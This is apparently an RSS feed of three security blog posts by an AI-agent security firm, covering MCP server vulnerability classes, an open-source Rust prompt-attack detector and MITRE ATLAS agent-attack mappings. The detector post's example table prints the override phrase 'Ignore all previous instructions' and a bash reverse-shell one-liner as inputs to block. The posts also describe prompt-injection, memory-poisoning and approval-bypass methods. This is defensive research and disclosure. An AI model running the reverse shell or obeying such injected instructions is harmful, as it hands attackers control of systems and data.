<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: AKAVLABS</title>
    <description>The latest articles on DEV Community by AKAVLABS (@akavlabs).</description>
    <link>https://dev.to/akavlabs</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/akavlabs"/>
    <language>en</language>
    <item>
      <title>The MCP Security Crisis: What We Found Hunting Vulnerabilities Across the Ecosystem</title>
      <dc:creator>AKAVLABS</dc:creator>
      <pubDate>Tue, 28 Apr 2026 08:36:18 +0000</pubDate>
      <link>https://dev.to/akavlabs/the-mcp-security-crisis-what-we-found-hunting-vulnerabilities-across-the-ecosystem-4aei</link>
      <guid>https://dev.to/akavlabs/the-mcp-security-crisis-what-we-found-hunting-vulnerabilities-across-the-ecosystem-4aei</guid>
      <description>&lt;h1&gt;
  
  
  The MCP Security Crisis: What We Found Hunting Vulnerabilities Across the Ecosystem
&lt;/h1&gt;

&lt;p&gt;&lt;em&gt;By Akav Labs | AgentSentry Research&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;The Model Context Protocol is quietly becoming the nervous system of enterprise AI. In the span of a few months, every major infrastructure company shipped an MCP server — Microsoft, MongoDB, Auth0, Cloudflare, ClickHouse, Upstash. Enterprises are connecting these servers to their LLM agents and pointing them at production databases, CI/CD pipelines, and authentication systems.&lt;/p&gt;

&lt;p&gt;Nobody audited them first.&lt;/p&gt;

&lt;p&gt;We spent several days doing systematic security research across the MCP ecosystem. What we found was not a collection of isolated bugs. It was the same classes of vulnerability, reproduced across vendor after vendor, suggesting that the ecosystem shipped fast and security thinking came later. This post documents the attack patterns we identified, the methodology we used, and what we believe needs to change.&lt;/p&gt;

&lt;p&gt;We are not naming specific vendors or CVE numbers in this post. Coordinated disclosure windows are active. When those windows close, the full technical advisories will be published. What we can share now is the methodology and the vulnerability classes — which we believe are present across far more MCP servers than the ones we examined.&lt;/p&gt;




&lt;h2&gt;
  
  
  Background: What MCP Actually Is
&lt;/h2&gt;

&lt;p&gt;For readers who haven't worked with it directly: the Model Context Protocol is a specification from Anthropic that standardizes how LLM agents communicate with external tools and data sources. An MCP server exposes a set of "tools" — functions the agent can call to read data, write data, or trigger actions. The agent decides which tools to call based on what it's trying to accomplish.&lt;/p&gt;

&lt;p&gt;The security model is implicit. The agent trusts the tools. The tools trust the agent. The data those tools return flows directly into the agent's context window, where it influences future decisions. There is no sandbox. There is no mandatory validation layer. There is a thin set of protocol-level hints — like &lt;code&gt;destructiveHint&lt;/code&gt;, which signals whether a tool should trigger a user confirmation — but these are advisory, not enforced.&lt;/p&gt;

&lt;p&gt;This architecture has a fundamental property that security engineers need to internalize: &lt;strong&gt;the attack surface is not just the tools themselves, it is everything those tools can read.&lt;/strong&gt; If a tool fetches a web page, a database record, a pull request description, or a log file, that content enters the agent's context. If an attacker controls that content, they can influence the agent's behavior. This is prompt injection, and it is the master key that makes every other MCP vulnerability exploitable.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Methodology
&lt;/h2&gt;

&lt;p&gt;We approached this the same way a red team approaches an unfamiliar codebase: systematically, starting broad and narrowing to confirmed exploitability.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Phase 1 — Discovery and triage.&lt;/strong&gt; We identified official MCP servers from high-value vendors: companies with enterprise customer bases, active bug bounty programs, and MCP implementations that touched sensitive operations. Database servers, CI/CD integrations, identity providers, infrastructure management tools. We cloned each repo and ran automated static analysis — semgrep with custom rules targeting MCP-specific patterns, bandit for Python targets, manual grep for credential handling, URL construction, and query parameterization.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Phase 2 — Pattern identification.&lt;/strong&gt; Static analysis produces signal, not findings. We reviewed every flag manually, looking for patterns that would be exploitable in a realistic agent deployment. We specifically looked for: unsanitized parameters being interpolated into queries or commands, credential material being returned in tool responses, read-only flags that didn't actually restrict dangerous operations, and missing or incorrect &lt;code&gt;destructiveHint&lt;/code&gt; annotations.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Phase 3 — Live verification.&lt;/strong&gt; This is where many security research workflows stop short, and where we made a deliberate rule for ourselves: &lt;strong&gt;no advisory without a confirmed live PoC.&lt;/strong&gt; We spun up local instances of every target — Docker containers for database servers, real accounts for cloud services, local npm installs for MCP framework libraries. Every finding was tested against a running instance before any disclosure was filed. One finding that looked strong on static analysis failed to reproduce on the current default configuration. We closed it rather than file a finding we couldn't prove.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Phase 4 — Disclosure.&lt;/strong&gt; GHSA private reporting where available, MSRC portal for Microsoft targets, direct email for vendors without a formal channel. Every disclosure included the vulnerable code location, a reproduction script, and expected output.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Vulnerability Classes
&lt;/h2&gt;

&lt;p&gt;Across the servers we examined, the same classes of vulnerability appeared repeatedly. We describe them here as patterns, not as vendor-specific findings.&lt;/p&gt;

&lt;h3&gt;
  
  
  Pattern 1: The destructiveHint Mislabel
&lt;/h3&gt;

&lt;p&gt;The MCP specification includes a &lt;code&gt;destructiveHint&lt;/code&gt; field in tool definitions. When set to &lt;code&gt;true&lt;/code&gt;, compliant MCP clients — Claude Desktop, Cursor, VS Code Copilot — are supposed to prompt the user before executing the tool. When set to &lt;code&gt;false&lt;/code&gt;, the tool executes silently.&lt;/p&gt;

&lt;p&gt;We found multiple instances where a tool that performs a genuinely destructive or sensitive operation was annotated with &lt;code&gt;destructiveHint: false&lt;/code&gt;. In one case, the mislabeled tool was the only write operation in an entire codebase that creates executable code — every other write operation was correctly annotated. The inconsistency was not random noise. It was a specific tool, doing a specific sensitive thing, with the wrong annotation.&lt;/p&gt;

&lt;p&gt;The exploitability of this pattern depends on prompt injection as a prerequisite. If an attacker can influence what content an LLM agent reads — through a malicious web page, a poisoned database record, a crafted pull request description — they can instruct the agent to call the mislabeled tool. Because &lt;code&gt;destructiveHint: false&lt;/code&gt;, the MCP client never warns the user. The operation executes silently.&lt;/p&gt;

&lt;p&gt;The fix is straightforward: audit every tool's &lt;code&gt;destructiveHint&lt;/code&gt; annotation against what the tool actually does. Any tool that creates, modifies, or deletes data — or that triggers an action with real-world consequences — should be annotated &lt;code&gt;true&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Pattern 2: The Read-Only Bypass
&lt;/h3&gt;

&lt;p&gt;Several MCP servers expose a "read-only mode" — a configuration flag or runtime setting that is supposed to restrict the agent to non-destructive operations. The security model relies on this flag to make the server safe for deployment in contexts where the agent shouldn't be able to modify data.&lt;/p&gt;

&lt;p&gt;We found multiple cases where the read-only flag did not restrict all dangerous operations. The common failure mode: the flag was implemented by blocking a specific list of write operations, rather than by allowing only a specific list of read operations. The difference matters enormously. A blocklist approach fails when there are operations that aren't writes in the traditional sense but still have dangerous effects — functions that execute arbitrary code, commands that flush entire databases, queries that exfiltrate sensitive data by design.&lt;/p&gt;

&lt;p&gt;One particularly clean example: a Redis MCP server marked a command execution tool as &lt;code&gt;readonly: true&lt;/code&gt; in its metadata. The tool accepted and executed &lt;code&gt;EVAL&lt;/code&gt; (arbitrary Lua code execution) and &lt;code&gt;FLUSHALL&lt;/code&gt; (destroys the entire database). Neither is a "write" in the key-value sense, but both are obviously destructive. The read-only flag provided false assurance to anyone who trusted it.&lt;/p&gt;

&lt;p&gt;The correct implementation of read-only mode is an allowlist, not a blocklist. Define exactly which operations are permitted in read-only mode. Reject everything else.&lt;/p&gt;

&lt;h3&gt;
  
  
  Pattern 3: The Elicitation Bypass
&lt;/h3&gt;

&lt;p&gt;The MCP protocol includes an elicitation mechanism — a way for the server to pause tool execution and ask the user a confirmation question. This is a more flexible version of &lt;code&gt;destructiveHint&lt;/code&gt;: instead of just flagging a tool as destructive, the server can ask a specific question before proceeding.&lt;/p&gt;

&lt;p&gt;We found an implementation where the elicitation function included a fallback: if the MCP client didn't support elicitation (which most clients don't, including Cursor and VS Code), the function returned &lt;code&gt;true&lt;/code&gt; and proceeded anyway. The safety mechanism failed open silently. On the majority of MCP clients in production use, the confirmation never happened.&lt;/p&gt;

&lt;p&gt;This is a subtle but important failure mode. The code appears to implement a safety check. It does implement a safety check — but only for clients that support the feature. For everyone else, it's a no-op that returns the permissive answer. A developer reading the code would see the elicitation call and reasonably conclude that dangerous operations are gated behind user confirmation. They would be wrong.&lt;/p&gt;

&lt;h3&gt;
  
  
  Pattern 4: Operator and Query Injection
&lt;/h3&gt;

&lt;p&gt;Multiple database MCP servers accepted raw query parameters that were passed through to the underlying database engine with insufficient validation. The specific mechanisms varied by database: SQL injection via unparameterized query strings, NoSQL operator injection via unsanitized aggregation pipelines, GraphQL injection via string interpolation in query construction.&lt;/p&gt;

&lt;p&gt;The NoSQL operator injection case was particularly interesting because it involved operators that execute server-side JavaScript — &lt;code&gt;$where&lt;/code&gt;, &lt;code&gt;$function&lt;/code&gt;, and &lt;code&gt;$accumulator&lt;/code&gt; in MongoDB's aggregation framework. These operators don't just retrieve data; they execute arbitrary JavaScript in the database engine's context. A filter meant to block dangerous aggregation stages checked for &lt;code&gt;$out&lt;/code&gt; and &lt;code&gt;$merge&lt;/code&gt; (the write operators) but not for the JavaScript execution operators. The check demonstrated awareness that stage filtering was necessary — the wrong stages were filtered.&lt;/p&gt;

&lt;p&gt;The GraphQL injection case involved a helper function that was used in some query paths but not others. One function supported parameterized variables; another didn't. A specific tool used the non-parameterized version, interpolating user input directly into the query string. The other tool using the parameterized version worked correctly. The inconsistency was invisible without reading both functions and tracing which one each tool called.&lt;/p&gt;

&lt;h3&gt;
  
  
  Pattern 5: Credential Exposure via Tool Response
&lt;/h3&gt;

&lt;p&gt;We found at least one case where an MCP tool's stated purpose was to return an API credential to the LLM context. The tool description itself noted that this credential was "not needed" by the server. The credential was returned anyway, making it available to any prompt injection payload that triggered the tool call.&lt;/p&gt;

&lt;p&gt;This is a design-level failure rather than an implementation bug. The tool should not exist. Credentials should not flow through the LLM context under any circumstances — they should be used by the server on the client's behalf, not returned to the agent. Any architecture that puts credentials in the LLM's context window should be treated as a potential exfiltration path.&lt;/p&gt;

&lt;h3&gt;
  
  
  Pattern 6: Spotlighting Coverage Gaps
&lt;/h3&gt;

&lt;p&gt;Microsoft's research team published a technique called "spotlighting" — wrapping tool responses in XML delimiters that clearly mark data as untrusted content, separate from instructions. The idea is to make it harder for prompt injection payloads embedded in data to influence the agent's behavior. Microsoft explicitly recommends this technique in their published guidance on LLM security.&lt;/p&gt;

&lt;p&gt;We examined a Microsoft-maintained MCP server and found that spotlighting was implemented in 3 of 91 tools — a 3.3% coverage rate. The 97% gap included exactly the tools most likely to contain attacker-controlled content: pull request descriptions, work item fields, wiki pages, code search results, comments. The tools that were protected were lower-risk read operations. The tools that were unprotected were the ones an attacker would target.&lt;/p&gt;

&lt;p&gt;There is a particular irony in finding a spotlighting coverage gap in a server maintained by the team that published the spotlighting technique. It suggests that even when security guidance exists and is understood by the team, the operational challenge of applying it consistently across a large tool surface is significant.&lt;/p&gt;




&lt;h2&gt;
  
  
  What This Means for the Ecosystem
&lt;/h2&gt;

&lt;p&gt;The pattern across these findings is not that individual developers made careless mistakes. The pattern is that MCP server development is happening faster than MCP security thinking, and the protocol itself does not make secure implementation the path of least resistance.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;destructiveHint&lt;/code&gt; is advisory. Elicitation support is optional. There is no mandatory input validation layer. There is no standardized way to mark content as untrusted before it enters the agent's context. The protocol gives developers the building blocks for a secure implementation, but it does not prevent an insecure one.&lt;/p&gt;

&lt;p&gt;Several things need to change at the ecosystem level:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Standardized security testing for MCP servers.&lt;/strong&gt; Before an official MCP server ships, it should go through the same kind of review that would be applied to any API handling sensitive operations. The vulnerability classes described in this post are not exotic. They are the same classes that appear in any API security audit. Standard tooling exists to find them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mandatory PoC verification before disclosure.&lt;/strong&gt; This is a lesson we learned ourselves during this research. Static analysis is hypothesis generation. Live verification is confirmation. A finding that looks like a critical vulnerability in source code may not be exploitable in the default configuration. File findings you can prove, not findings you believe.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Spotlighting as a default, not an optimization.&lt;/strong&gt; Any tool that returns user-controlled content should wrap that content in untrusted-data delimiters. This should be the default behavior in MCP server frameworks, not a technique developers have to know about and apply manually.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Read-only mode as an allowlist.&lt;/strong&gt; Any MCP server that exposes a read-only configuration should define read-only as an explicit allowlist of permitted operations, not a blocklist of prohibited ones.&lt;/p&gt;




&lt;h2&gt;
  
  
  What's Next
&lt;/h2&gt;

&lt;p&gt;We are continuing this research. The advisories filed during this research are under coordinated disclosure. When the disclosure windows close — beginning in July 2026 — we will publish the full technical details: vendor names, CVE numbers, PoC scripts, and fix recommendations.&lt;/p&gt;

&lt;p&gt;In the meantime, if you are operating an MCP server in a production environment, the questions worth asking are: Do you know which of your tools have incorrect &lt;code&gt;destructiveHint&lt;/code&gt; annotations? Does your read-only mode use an allowlist or a blocklist? Does any tool return credential material in its response? Are the tools that read user-controlled content applying any form of untrusted-data marking?&lt;/p&gt;

&lt;p&gt;These are not hard questions to answer. They are easy to overlook when you are moving fast.&lt;/p&gt;

&lt;p&gt;AgentSentry by Akav Labs is a transparent MCP gateway that applies enforcement policies to agent tool calls before they reach your MCP servers. If you are interested in the research or want to discuss your MCP security posture, reach out at &lt;a href="mailto:akavlabs@pm.me"&gt;akavlabs@pm.me&lt;/a&gt;.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Akav Labs is a security research organization focused on AI agent security. The AgentSentry platform provides runtime protection for MCP deployments. All vendor disclosures in this research were handled under coordinated disclosure principles.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;© 2026 Akav Labs — akav.io&lt;/em&gt;&lt;/p&gt;

</description>
      <category>agents</category>
      <category>llm</category>
      <category>mcp</category>
      <category>security</category>
    </item>
    <item>
      <title>We open-sourced our AI attack detection engine — 97 MITRE ATLAS rules in a Rust crate</title>
      <dc:creator>AKAVLABS</dc:creator>
      <pubDate>Mon, 13 Apr 2026 10:42:55 +0000</pubDate>
      <link>https://dev.to/akavlabs/we-open-sourced-our-ai-attack-detection-engine-97-mitre-atlas-rules-in-a-rust-crate-522i</link>
      <guid>https://dev.to/akavlabs/we-open-sourced-our-ai-attack-detection-engine-97-mitre-atlas-rules-in-a-rust-crate-522i</guid>
      <description>&lt;p&gt;Today we're publishing &lt;code&gt;atlas-detect&lt;/code&gt; — the detection engine that powers AgentSentry's AI attack prevention — as a standalone open-source Rust crate.&lt;/p&gt;

&lt;p&gt;→ &lt;a href="https://crates.io/crates/atlas-detect" rel="noopener noreferrer"&gt;https://crates.io/crates/atlas-detect&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;The problem we were solving&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When we started building AgentSentry, we needed to answer one question on every LLM API call: is this request an attack?&lt;/p&gt;

&lt;p&gt;Not a heuristic guess. Not a vibe check. An actual mapping to the MITRE ATLAS framework — the authoritative catalogue of adversarial techniques targeting AI systems.&lt;/p&gt;

&lt;p&gt;MITRE ATLAS has 16 tactics and 111 techniques. We needed to cover as many as possible, in real time, with zero tolerance for false positives on legitimate developer queries.&lt;/p&gt;

&lt;p&gt;Here's what that looks like in practice:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;"Ignore all previous instructions"          → AML.T0036 (Prompt Injection) — BLOCK
"How do I override a method in Python?"     → nothing — ALLOW  
"bash -i &amp;gt;&amp;amp; /dev/tcp/10.0.0.1/4444 0&amp;gt;&amp;amp;1"  → AML.T0057.002 (Reverse Shell) — BLOCK
"Explain how prompt injection works"        → nothing — ALLOW (educational context)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The second and fourth lines are where most detectors fail. We spent significant time on this.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;How it works&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The engine compiles all 97 detection patterns into a single &lt;code&gt;RegexSet&lt;/code&gt; using Rust's &lt;code&gt;regex&lt;/code&gt; crate. This means every request is scanned against all rules in one pass — not 97 sequential checks.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;use&lt;/span&gt; &lt;span class="nn"&gt;atlas_detect&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;Detector&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;detector&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;Detector&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;hits&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;detector&lt;/span&gt;&lt;span class="nf"&gt;.scan&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Ignore all previous instructions"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;detector&lt;/span&gt;&lt;span class="nf"&gt;.should_block&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;hits&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Returns: ["AML.T0036"]&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The initial compilation is cached globally via &lt;code&gt;once_cell&lt;/code&gt;. After the first call, &lt;code&gt;Detector::new()&lt;/code&gt; is free. Scan latency on typical LLM prompts is under 1ms.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;The false positive problem&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Early versions had a 30% false positive rate. Security education queries like "explain how prompt injection works for my course" were getting blocked alongside actual attacks.&lt;/p&gt;

&lt;p&gt;The fix was confidence scoring. When a pattern matches, we compute a confidence score based on:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Base score from severity (Critical = 80, High = 65, Medium = 50...)&lt;/li&gt;
&lt;li&gt;+20 if multiple techniques fire together (coordinated attack signal)&lt;/li&gt;
&lt;li&gt;+20 if this agent has a high historical block rate&lt;/li&gt;
&lt;li&gt;+10 if the message is unusually short (injections tend to be terse)&lt;/li&gt;
&lt;li&gt;-25 if educational/research framing is detected&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After scoring, we filter by threshold. A medium-severity hit needs 60% confidence to become a block. Critical hits only need 50%.&lt;/p&gt;

&lt;p&gt;Result: 0% false positives on a 20-query clean test battery, 100% true positive rate maintained.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;What it detects&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;97 content-detectable techniques across all 16 MITRE ATLAS tactics:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Prompt injection variants (AML.T0036 and sub-techniques)&lt;/li&gt;
&lt;li&gt;Jailbreaks — DAN, STAN, roleplay framing, authority impersonation&lt;/li&gt;
&lt;li&gt;Credential exfiltration — env var dumps, RAG credential harvesting&lt;/li&gt;
&lt;li&gt;Model extraction — weight theft, system prompt extraction&lt;/li&gt;
&lt;li&gt;RAG poisoning — embedded instructions in document-like content&lt;/li&gt;
&lt;li&gt;Reverse shells and C2 — bash one-liners, PowerShell encoded commands&lt;/li&gt;
&lt;li&gt;Multilingual injections — 20+ languages including Cyrillic homoglyphs&lt;/li&gt;
&lt;li&gt;Base64/obfuscation evasion — decoded and re-scanned&lt;/li&gt;
&lt;li&gt;Deepfake generation requests&lt;/li&gt;
&lt;li&gt;Data destruction commands&lt;/li&gt;
&lt;li&gt;Denial of service patterns&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;14 additional ATLAS techniques require behavioral detection (rate limiting, auth pattern analysis) — content regex can't catch them, and &lt;code&gt;atlas-detect&lt;/code&gt; is honest about this in the docs.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Why open source this&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The detection rules are not our competitive advantage. Anyone determined enough could reconstruct them from the MITRE ATLAS documentation.&lt;/p&gt;

&lt;p&gt;Our advantage is the integrated system: the enforcement gateway, agent discovery, incident correlation, topology mapping, per-agent policy engine, and the platform that ties it all together. That stays closed.&lt;/p&gt;

&lt;p&gt;But the detection engine is genuinely useful to the Rust community — anyone building an LLM proxy, an AI security tool, or just adding safety checks to an AI application. Publishing it creates goodwill, drives inbound interest in AgentSentry, and positions Akav Labs as contributors to the AI security ecosystem rather than just consumers of it.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Using it in your project&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight toml"&gt;&lt;code&gt;&lt;span class="nn"&gt;[dependencies]&lt;/span&gt;
&lt;span class="py"&gt;atlas-detect&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"0.1"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;With serde for JSON serialization:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight toml"&gt;&lt;code&gt;&lt;span class="py"&gt;atlas-detect&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="py"&gt;version&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"0.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="py"&gt;features&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s"&gt;"serde"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;With context for better accuracy:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;use&lt;/span&gt; &lt;span class="nn"&gt;atlas_detect&lt;/span&gt;&lt;span class="p"&gt;::{&lt;/span&gt;&lt;span class="n"&gt;Detector&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ScanContext&lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;detector&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;Detector&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ScanContext&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;user_message&lt;/span&gt;&lt;span class="nf"&gt;.to_string&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
    &lt;span class="n"&gt;agent_block_history&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;get_agent_block_ratio&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;agent_id&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="o"&gt;..&lt;/span&gt;&lt;span class="nn"&gt;Default&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;default&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;hits&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;detector&lt;/span&gt;&lt;span class="nf"&gt;.scan_with_context&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Full documentation at docs.rs/atlas-detect.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;What's next&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;We're working on:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;atlas-detect-async&lt;/code&gt; — async wrapper for Tokio-based applications&lt;/li&gt;
&lt;li&gt;Rule contribution guidelines — the community should be able to add patterns&lt;/li&gt;
&lt;li&gt;OWASP Agentic Top 10 coverage alongside MITRE ATLAS&lt;/li&gt;
&lt;li&gt;Language model-based detection for evasion-resistant techniques&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you're building something with this, we want to know. Open an issue on github.com/akav-labs/atlas-detect or find us at &lt;a href="mailto:security@akav.io"&gt;security@akav.io&lt;/a&gt;.&lt;/p&gt;




&lt;p&gt;Built by Akav Labs — the team behind AgentSentry, the AI agent security platform.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://akav.io" rel="noopener noreferrer"&gt;https://akav.io&lt;/a&gt; | &lt;a href="https://as.akav.io" rel="noopener noreferrer"&gt;https://as.akav.io&lt;/a&gt; | &lt;a href="https://crates.io/crates/atlas-detect" rel="noopener noreferrer"&gt;https://crates.io/crates/atlas-detect&lt;/a&gt;&lt;/p&gt;

</description>
      <category>rust</category>
      <category>security</category>
      <category>llm</category>
      <category>opensource</category>
    </item>
    <item>
      <title>I mapped all 84 MITRE ATLAS techniques to AI agent detection rules — here's what I found</title>
      <dc:creator>AKAVLABS</dc:creator>
      <pubDate>Tue, 31 Mar 2026 19:27:45 +0000</pubDate>
      <link>https://dev.to/akavlabs/i-mapped-all-84-mitre-atlas-techniques-to-ai-agent-detection-rules-heres-what-i-found-1o18</link>
      <guid>https://dev.to/akavlabs/i-mapped-all-84-mitre-atlas-techniques-to-ai-agent-detection-rules-heres-what-i-found-1o18</guid>
      <description>&lt;p&gt;Today Linx Security raised $50M for AI agent identity governance. &lt;br&gt;
It validates the market. But there's a gap nobody is talking about.&lt;/p&gt;

&lt;p&gt;Identity governance tells you what agents are &lt;strong&gt;allowed&lt;/strong&gt; to do.&lt;br&gt;&lt;br&gt;
Runtime security tells you what they're &lt;strong&gt;actually doing&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;MITRE ATLAS documents 84 techniques for attacking AI systems.&lt;br&gt;&lt;br&gt;
Zero commercial products map detection rules to all 84.&lt;/p&gt;

&lt;p&gt;I spent the last several months mapping them. The repo is open source,&lt;br&gt;&lt;br&gt;
Sigma-compatible YAML, LangChain coverage live.&lt;/p&gt;

&lt;p&gt;The 3 most dangerous techniques right now:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;AML.T0054 — Prompt Injection&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Agent reads external content containing malicious instructions.&lt;br&gt;&lt;br&gt;
Executes them because it can't distinguish attacker input from task input.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Memory Poisoning&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
False instructions planted in agent memory activate days later.&lt;br&gt;&lt;br&gt;
The agent's future behavior is controlled by a past attacker.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A2A Relay Attack&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Sub-agent receives instructions from a compromised parent.&lt;br&gt;&lt;br&gt;
No mechanism to verify the instruction chain wasn't hijacked.&lt;/p&gt;

&lt;p&gt;Detection has to happen at inference time — before execution.&lt;br&gt;&lt;br&gt;
Not after the governance layer logs the completed action.&lt;/p&gt;

&lt;p&gt;→ &lt;a href="https://github.com/akav-labs/atlas-agent-rules" rel="noopener noreferrer"&gt;github.com/akav-labs/atlas-agent-rules&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Full writeup on the Linx gap here:&lt;br&gt;&lt;br&gt;
→ &lt;a href="https://open.substack.com/pub/akavlabs/p/linx-just-raised-50m-for-ai-agent" rel="noopener noreferrer"&gt;AgentSentry Research&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>agents</category>
      <category>opensource</category>
    </item>
  </channel>
</rss>
